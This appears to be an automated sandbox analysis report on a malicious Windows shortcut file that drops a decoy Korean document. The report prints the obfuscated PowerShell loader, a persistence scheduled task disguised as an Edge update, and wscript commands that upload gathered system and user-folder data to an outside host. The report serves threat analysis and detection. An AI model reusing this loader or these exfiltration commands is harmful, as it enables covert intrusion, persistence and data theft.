484323e010793b16594c9d92694ea1ef275d8a588e1fcddd6826cdf4cce68db5

Analysis

max time kernel
121s
max time network
124s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
30/08/2023, 08:13

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

484323e010793b16594c9d92694ea1ef275d8a588e1fcddd6826cdf4cce68db5.lnk
Size

9.1MB
MD5

d7d48592bc21b37c02891e0e036bf26c
SHA1

b791cf55ac70224c5e7c98167bf497c54996fe6e
SHA256

484323e010793b16594c9d92694ea1ef275d8a588e1fcddd6826cdf4cce68db5
SHA512

701df072063081f1ede72081162ef2f7d80550f0065d4789f1d780f5fa0e6885cb07ad6fa77dc2ec11c96cbf47e0cdfa78d125e663d718aab69cdc9521ef1f9e
SSDEEP

1536:F87Z/vCysdk1li8/BTYv+JOIp/vsbzkndElIuFfqqeK7NaXizmA6Jw8BdZ1QDupA:F87QysOJRJOKvu5hcCgZ1k

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
9	2044	wscript.exe
11	1060	wscript.exe
13	2800	wscript.exe
15	2868	wscript.exe
17	268	wscript.exe
19	1708	wscript.exe
21	3040	wscript.exe
23	2768	wscript.exe

Deletes itself 1 IoCs

pid	Process
2144	powershell.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2168	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2640	timeout.exe
1724	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1268	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1952	systeminfo.exe

Modifies registry class 9 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\hwp_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\hwp_auto_file\shell\Read\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\hwp_auto_file	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\hwp_auto_file\	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\.hwp	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\.hwp\ = "hwp_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\hwp_auto_file\shell\Read	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\hwp_auto_file\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_Classes\Local Settings	rundll32.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2232	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2144	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2364	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	1268	tasklist.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2364	AcroRd32.exe
2364	AcroRd32.exe
2364	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3020 wrote to memory of 2232	3020	cmd.exe	29
PID 3020 wrote to memory of 2232	3020	cmd.exe	29
PID 3020 wrote to memory of 2232	3020	cmd.exe	29
PID 3020 wrote to memory of 2232	3020	cmd.exe	29
PID 2232 wrote to memory of 2972	2232	cmd.exe	30
PID 2232 wrote to memory of 2972	2232	cmd.exe	30
PID 2232 wrote to memory of 2972	2232	cmd.exe	30
PID 2232 wrote to memory of 2972	2232	cmd.exe	30
PID 2232 wrote to memory of 2144	2232	cmd.exe	31
PID 2232 wrote to memory of 2144	2232	cmd.exe	31
PID 2232 wrote to memory of 2144	2232	cmd.exe	31
PID 2232 wrote to memory of 2144	2232	cmd.exe	31
PID 2144 wrote to memory of 2772	2144	powershell.exe	32
PID 2144 wrote to memory of 2772	2144	powershell.exe	32
PID 2144 wrote to memory of 2772	2144	powershell.exe	32
PID 2144 wrote to memory of 2772	2144	powershell.exe	32
PID 2144 wrote to memory of 2772	2144	powershell.exe	32
PID 2144 wrote to memory of 2772	2144	powershell.exe	32
PID 2144 wrote to memory of 2772	2144	powershell.exe	32
PID 2144 wrote to memory of 1992	2144	powershell.exe	33
PID 2144 wrote to memory of 1992	2144	powershell.exe	33
PID 2144 wrote to memory of 1992	2144	powershell.exe	33
PID 2144 wrote to memory of 1992	2144	powershell.exe	33
PID 1992 wrote to memory of 1944	1992	wscript.exe	34
PID 1992 wrote to memory of 1944	1992	wscript.exe	34
PID 1992 wrote to memory of 1944	1992	wscript.exe	34
PID 1992 wrote to memory of 1944	1992	wscript.exe	34
PID 1944 wrote to memory of 2168	1944	cmd.exe	36
PID 1944 wrote to memory of 2168	1944	cmd.exe	36
PID 1944 wrote to memory of 2168	1944	cmd.exe	36
PID 1944 wrote to memory of 2168	1944	cmd.exe	36
PID 2772 wrote to memory of 2364	2772	rundll32.exe	37
PID 2772 wrote to memory of 2364	2772	rundll32.exe	37
PID 2772 wrote to memory of 2364	2772	rundll32.exe	37
PID 2772 wrote to memory of 2364	2772	rundll32.exe	37
PID 1944 wrote to memory of 1152	1944	cmd.exe	38
PID 1944 wrote to memory of 1152	1944	cmd.exe	38
PID 1944 wrote to memory of 1152	1944	cmd.exe	38
PID 1944 wrote to memory of 1152	1944	cmd.exe	38
PID 1944 wrote to memory of 1268	1944	cmd.exe	40
PID 1944 wrote to memory of 1268	1944	cmd.exe	40
PID 1944 wrote to memory of 1268	1944	cmd.exe	40
PID 1944 wrote to memory of 1268	1944	cmd.exe	40
PID 1944 wrote to memory of 1952	1944	cmd.exe	42
PID 1944 wrote to memory of 1952	1944	cmd.exe	42
PID 1944 wrote to memory of 1952	1944	cmd.exe	42
PID 1944 wrote to memory of 1952	1944	cmd.exe	42
PID 1944 wrote to memory of 2640	1944	cmd.exe	44
PID 1944 wrote to memory of 2640	1944	cmd.exe	44
PID 1944 wrote to memory of 2640	1944	cmd.exe	44
PID 1944 wrote to memory of 2640	1944	cmd.exe	44
PID 1944 wrote to memory of 2044	1944	cmd.exe	45
PID 1944 wrote to memory of 2044	1944	cmd.exe	45
PID 1944 wrote to memory of 2044	1944	cmd.exe	45
PID 1944 wrote to memory of 2044	1944	cmd.exe	45
PID 1944 wrote to memory of 1060	1944	cmd.exe	47
PID 1944 wrote to memory of 1060	1944	cmd.exe	47
PID 1944 wrote to memory of 1060	1944	cmd.exe	47
PID 1944 wrote to memory of 1060	1944	cmd.exe	47
PID 1944 wrote to memory of 2800	1944	cmd.exe	48
PID 1944 wrote to memory of 2800	1944	cmd.exe	48
PID 1944 wrote to memory of 2800	1944	cmd.exe	48
PID 1944 wrote to memory of 2800	1944	cmd.exe	48
PID 1944 wrote to memory of 2868	1944	cmd.exe	49

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\484323e010793b16594c9d92694ea1ef275d8a588e1fcddd6826cdf4cce68db5.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden "$JjVKo = Get-Location;if($JjVKo -Match 'System32' -or $JjVKo -Match 'Program Files') {$JjVKo = 'C:\Users\Admin\AppData\Local\Temp';};$v5mjSdTKe9b1 = Get-ChildItem -Path $JjVKo -Recurse *.lnk | where-object {$_.length -eq 0x00919999} | Select-Object -ExpandProperty FullName;$JjVKo = Split-Path $v5mjSdTKe9b1;$CpJo3T = New-Object System.IO.FileStream($v5mjSdTKe9b1, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$CpJo3T.Seek(0x00001A1D, [System.IO.SeekOrigin]::Begin);$BN0IHr781w = New-Object byte[] 0x0000A600;$CpJo3T.Read($BN0IHr781w, 0, 0x0000A600);$Y_70Xj = $JjVKo + '\' + [regex]::unescape('2023-2-주차등록신청서-학생용.hwp');sc $Y_70Xj $BN0IHr781w -Encoding Byte;& $Y_70Xj;$CpJo3T.Seek(0x0000C080, [System.IO.SeekOrigin]::Begin);$cFTvmVv_If_vY=New-Object byte[] 0x000148D2;$CpJo3T.Read($cFTvmVv_If_vY, 0, 0x000148D2);$CpJo3T.Close();Remove-Item -Path $v5mjSdTKe9b1 -Force;$KmUVxUr=$env:public + '\' + 'update_cmd.zip';sc $KmUVxUr $cFTvmVv_If_vY -Encoding Byte;$RNTrgY = new-object -com shell.application;$l07d3l1qO = $RNTrgY.Namespace($KmUVxUr);$RNTrgY.Namespace($env:public + '\' + 'documents').CopyHere($l07d3l1qO.items(), 1044) | out-null;remove-item -path $KmUVxUr -force;$kBy_bk4v9=$env:public+'\Documents\update.vbs';& wscript.exe $kBy_bk4v9;"
  2⤵
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of WriteProcessMemory
  PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
    3⤵
    PID:2972
- - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$JjVKo = Get-Location;if($JjVKo -Match 'System32' -or $JjVKo -Match 'Program Files') {$JjVKo = 'C:\Users\Admin\AppData\Local\Temp';};$v5mjSdTKe9b1 = Get-ChildItem -Path $JjVKo -Recurse *.lnk | where-object {$_.length -eq 0x00919999} | Select-Object -ExpandProperty FullName;$JjVKo = Split-Path $v5mjSdTKe9b1;$CpJo3T = New-Object System.IO.FileStream($v5mjSdTKe9b1, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$CpJo3T.Seek(0x00001A1D, [System.IO.SeekOrigin]::Begin);$BN0IHr781w = New-Object byte[] 0x0000A600;$CpJo3T.Read($BN0IHr781w, 0, 0x0000A600);$Y_70Xj = $JjVKo + '\' + [regex]::unescape('2023-2-주차등록신청서-학생용.hwp');sc $Y_70Xj $BN0IHr781w -Encoding Byte;& $Y_70Xj;$CpJo3T.Seek(0x0000C080, [System.IO.SeekOrigin]::Begin);$cFTvmVv_If_vY=New-Object byte[] 0x000148D2;$CpJo3T.Read($cFTvmVv_If_vY, 0, 0x000148D2);$CpJo3T.Close();Remove-Item -Path $v5mjSdTKe9b1 -Force;$KmUVxUr=$env:public + '\' + 'update_cmd.zip';sc $KmUVxUr $cFTvmVv_If_vY -Encoding Byte;$RNTrgY = new-object -com shell.application;$l07d3l1qO = $RNTrgY.Namespace($KmUVxUr);$RNTrgY.Namespace($env:public + '\' + 'documents').CopyHere($l07d3l1qO.items(), 1044) | out-null;remove-item -path $KmUVxUr -force;$kBy_bk4v9=$env:public+'\Documents\update.vbs';& wscript.exe $kBy_bk4v9;"
    3⤵
    - Deletes itself
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\2023-2-주차등록신청서-학생용.hwp
      4⤵
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2772
    - - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\2023-2-주차등록신청서-학생용.hwp"
        5⤵
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:2364
  - - C:\Windows\SysWOW64\wscript.exe
      "C:\Windows\system32\wscript.exe" C:\Users\Public\Documents\update.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1992
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Public\Documents\stopedge.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1944
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 33 /tn "MicrosoftEdgeEasyUpdate" /tr "C:\Users\Public\Documents\install.vbs" /f
        6⤵
        Creates scheduled task(s)
        
        PID:2168
      - C:\Windows\SysWOW64\nslookup.exe
        
        nslookup myip.opendns.com resolver1.opendns.com
        6⤵
        
        PID:1152
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1268
      - C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:1952
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout -t 5 /nobreak
        6⤵
        Delays execution with timeout.exe
        
        PID:2640
      - C:\Windows\SysWOW64\wscript.exe
        
        WScript.exe unactivate.vbs "http://anrun.kr/movie/contents.php" "YKQDESCX_userdown" "cuserdown.data"
        6⤵
        Blocklisted process makes network request
        
        PID:2044
      - C:\Windows\SysWOW64\wscript.exe
        
        WScript.exe unactivate.vbs "http://anrun.kr/movie/contents.php" "YKQDESCX_userdocu" "cuserdocu.data"
        6⤵
        Blocklisted process makes network request
        
        PID:1060
      - C:\Windows\SysWOW64\wscript.exe
        
        WScript.exe unactivate.vbs "http://anrun.kr/movie/contents.php" "YKQDESCX_userdesk" "cuserdesk.data"
        6⤵
        Blocklisted process makes network request
        
        PID:2800
      - C:\Windows\SysWOW64\wscript.exe
        
        WScript.exe unactivate.vbs "http://anrun.kr/movie/contents.php" "YKQDESCX_prog" "cprog.data"
        6⤵
        Blocklisted process makes network request
        
        PID:2868
      - C:\Windows\SysWOW64\wscript.exe
        
        WScript.exe unactivate.vbs "http://anrun.kr/movie/contents.php" "YKQDESCX_prog32" "cprog32.data"
        6⤵
        Blocklisted process makes network request
        
        PID:268
      - C:\Windows\SysWOW64\wscript.exe
        
        WScript.exe unactivate.vbs "http://anrun.kr/movie/contents.php" "YKQDESCX_ipinfo" "ipinfo.data"
        6⤵
        Blocklisted process makes network request
        
        PID:1708
      - C:\Windows\SysWOW64\wscript.exe
        
        WScript.exe unactivate.vbs "http://anrun.kr/movie/contents.php" "YKQDESCX_tasklist" "tsklt.data"
        6⤵
        Blocklisted process makes network request
        
        PID:3040
      - C:\Windows\SysWOW64\wscript.exe
        
        WScript.exe unactivate.vbs "http://anrun.kr/movie/contents.php" "YKQDESCX_systeminfo" "systeminfo.data"
        6⤵
        Blocklisted process makes network request
        
        PID:2768
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout -t 5 /nobreak
        6⤵
        Delays execution with timeout.exe
        
        PID:1724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2023-2-주차등록신청서-학생용.hwp

Filesize
41KB

MD5
c5bae3e3b20a3945d4399bfa6c0860e7

SHA1
a75e3d86bb65e97905b31336388c746b896d0790

SHA256
2b40c86e914cf1e001abbbc45947ea84ec30682f09b9a896d05ae442d5533cba

SHA512
e410476a1bf94824511879911cafa6b529cdca95739035df855f7078fadf5bc04693f6609e26e3f5ddbc4fc009a0d3502a37591806320550aab97876f27fa3a9

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
24a1b5a6a00bbb142783c652a8aee216

SHA1
7ed6d1a9638a20d38b8c612b92ef25c7b4244e4a

SHA256
0a5cc0bdad5d7b0afb48c23e7fb747c947b3b647cd8dbb1e0010034502e0bd6a

SHA512
16cdc6ab6637bbbb350fac20ce2caa4390199b6dcd4a3ed3a62cce112e11394daa98ef715221653107d337448d9d26cf820b9f461e2a70c562b5eabed6cc16c0

Download Submit
C:\Users\Public\Documents\cprog.data

Filesize
2KB

MD5
57616768582dafc0af18dc2268c40b15

SHA1
accd04162051654666a4fd769b755383a14dbc82

SHA256
5cb775e92a55f07fca972cb281271847b4bb0c6cb62644b988566e22a0014869

SHA512
37e13c6be09866ea805287746ca304e926e24a77b328b596f5b906c7e10a1be350efb424cd56a141157c998dc794ccdbcdf523601cc3bc6ab491b6b31a0a0471

Download Submit
C:\Users\Public\Documents\cprog32.data

Filesize
1KB

MD5
a5f19aedeec95e1209c39bc61db44559

SHA1
3db44a85299beeeeccd79b8daed468000ac275de

SHA256
d0d562b4a00aab6c6862b831cd9b287762d18f8f3e1960c99becd8d95cc8cd41

SHA512
57cc0bb294fa90377878fe8cff996228817ac00aaa0716219312d26eac306ce464c2e6ac816597a55ea0e6beb140d0d0e6e546c742df1f79f84329df522fc726

Download Submit
C:\Users\Public\Documents\cuserdesk.data

Filesize
1KB

MD5
a2900b6c62c403ef59ab1d59acd9d6c4

SHA1
2ef033b4d341412e5d508b815ac6835d663c2453

SHA256
bc560f235ca442516102c902448d12f3d62ee3bf73867c277ad16c7d477b377b

SHA512
4a14c5c2ebc7198140251db2dbef19456d367e36c4a461fc5268b5b45472f1666b0961140cfd60acec64d017492caab2dfd89b58d43ddaf1f997f376a479652e

Download Submit
C:\Users\Public\Documents\cuserdocu.data

Filesize
2KB

MD5
d815145e63e42ffb5d5c7ec8076af428

SHA1
aa8be78eb8b4636d16f574c037761d699299ac75

SHA256
0c9d4d9db96a961f4cc50819d5be6297e2a2e36fa93c46b011d86038a3f0a65b

SHA512
cfced0f87e7856f6c962d282032acc7656ebb8ce08bad43dc7a7b0c668de9812f32bdf208b24efb4522ff5a5085b9cb3114b822f928f2107ada7850f1b303490

Download Submit
C:\Users\Public\Documents\cuserdown.data

Filesize
2KB

MD5
1337369d944c7fbdea80d5e0e1fec6b8

SHA1
3e47f1ae82502b1a6389c3860c8e38e8a2aedd1b

SHA256
17f3ebfe837b4591d07aaac2c72de417c94705bbf55c0d402f17b064e54684d2

SHA512
c12f39aff4fee10ea2af73c50f3e8c6d875d30feb020b2ab8ff743c9e5777799052ed1bd95d9c35219be71ea5f571383572f36a936712f4b1d8a7f39e2475754

Download Submit
C:\Users\Public\Documents\ipinfo.data

Filesize
107B

MD5
82f12896705faeb1630b62f16d5f5cc8

SHA1
9ed376a84dd777c28d4510cd747da4fbbc2ff63b

SHA256
caccfc569992c55c1e532dd816a6e1846281397127c61e3403294d527780a35e

SHA512
e1f04928aea8e710cd34fd6a0580ad9fe2f045485574b1ba4e4e7db376cffd9dacbc15e51f54cb247a85985739b0d70b9e783c1e573ceb8785fc0662be35c379

Download Submit
C:\Users\Public\Documents\paycom.ini

Filesize
475B

MD5
75ca52afafe3fe6c053da9f1db90590a

SHA1
b8b98334669585b1646c2d15bf6a4728e44c3971

SHA256
0959301d71202a36aa82d465e200f853c22a38f4561a259720daca5088a58236

SHA512
2bcf7e88ffdfc5bff6bc03da8515ef6d5014ce4a65546393c719001d7e83952807c970919f3563c3b6c15ea9daed841977d4307afa0c658502ac023fbfef159d

Download Submit
C:\Users\Public\Documents\stopedge.bat

Filesize
271B

MD5
ff4067b4865c9b49da2f28ac12ca5c1a

SHA1
4e4c6e4db270adf87abb11dba732503a59675dbd

SHA256
7b5e799d1a7e0ffc4d6611950dcc84e880604152217fa283ed73f3cf60aa766e

SHA512
0fb3e9e9b5e6b12fcd8b8d1fe1216026569cdaad66cce3ad6042baeeba026df82e87438d97f11f24c8850955c47aab414883b4e4f73852a6ce8e329f5ea3d82a

Download Submit
C:\Users\Public\Documents\systeminfo.data

Filesize
1KB

MD5
4d786a7deec5a883e2d34fdd7794f9b4

SHA1
7c8439fce58b9cf7acc4d897e157511e0dcfe9ba

SHA256
7a3ceee72bfe2bb77ca963d887f29d9728e597a0d0ff6db44b05326c1e978a04

SHA512
68b0dfecd4c58a99b59e19b1987a3ebabf02b91aba7fbadfe95a531a2cd99f28215d644ccf8f7435e29a7a5fea85345fde80489f3e34f7e99a2783b2df768d88

Download Submit
C:\Users\Public\Documents\tsklt.data

Filesize
2KB

MD5
1b4a72ddc50e980c392ba4c73cee3093

SHA1
7414ff856a99a24b17635779db66639c33901820

SHA256
dffac92f2b25794c11ce72231c50773a9489e1a5bdc97dc6f84d11063857c76c

SHA512
899ddc73e89807fee00729234d5d21dc8aa69878f7464ef0bc8a56f4a876314bbf098f4a9134b6faaf94f9fc22e195ea94ffff88e0569272214ff97b2d54b9dd

Download Submit
C:\Users\Public\Documents\unactivate.vbs

Filesize
6KB

MD5
6b944c9dc4b760fffb56adf4fecf6764

SHA1
8fa45d0e0cfc8fcae4f02098dcce116375b221c0

SHA256
dc1bab58ae5af6a4b8051a148d96ae713f319327959225d1860ab910f27e2658

SHA512
feb78dc11edb6677e07ec1c58f49b9e2589c0ba4bfc94259aae7cd4f4ec9765a59dad0482015342dd4f64ae421c06c81cdf37ee71a0031ad7dfb111bcfe1920c

Download Submit
C:\Users\Public\Documents\update.vbs

Filesize
1KB

MD5
90468e4bdf61cf146030515ed3e15d81

SHA1
547e011cb39e295f570762545c8b025752bf3086

SHA256
bfe222ae24b44e7ed9ebfe1c4fcfe10262fa81f9f06f6085504a6ecde63c7edd

SHA512
1c4eacc955f82d594b1092cb01f6b305376a402c77a44792f8be70c3a2f7cf893fcfd8468c686ae90ade9d353561ed09844bca5014f04b860dc6481baf349434

Download Submit
C:\Users\Public\Documents\versioninfo.bat

Filesize
1KB

MD5
168bcc063501d191d82aaa3a32741a12

SHA1
4920bb4feb3483412b8ab9ae800900e56c1bcf2a

SHA256
9859a4209ac3b00448b7552b993ff8120f0e7e7568b1c7ae55bf1f104889b3e7

SHA512
83e525ac798bd5afdd32c0fc223237e9fbe703ff1dd517d516f11064c37c2a61b47c5283f40d7c16f8adc97cd9c2fd2f78bf3d930352625accb0b2f118eed392

Download Submit
C:\Users\Public\UPDATE~1.ZIP

Filesize
82KB

MD5
2c2b800c2e20f5f3ae0332bf59f8df13

SHA1
fd131968bd86f6be18aba660cd7e7c941b5bb1cd

SHA256
afc742412c9071d0a989aaa94dbf439882c1ebc19b095588989489006ecbe7df

SHA512
4c9c050bda7d6d97567835a110b5c1622076a209eaee752f3551f5e7353bd0eeff0d18308af8268ebd4921421c09f83846671ab6ff00730858cb2bf780f233d2

Download Submit
memory/2144-41-0x0000000002840000-0x0000000002880000-memory.dmp

Filesize
256KB

Download
memory/2144-40-0x0000000002840000-0x0000000002880000-memory.dmp

Filesize
256KB

Download
memory/2144-38-0x00000000741E0000-0x000000007478B000-memory.dmp

Filesize
5.7MB

Download
memory/2144-39-0x00000000741E0000-0x000000007478B000-memory.dmp

Filesize
5.7MB

Download
memory/2144-169-0x00000000741E0000-0x000000007478B000-memory.dmp

Filesize
5.7MB

Download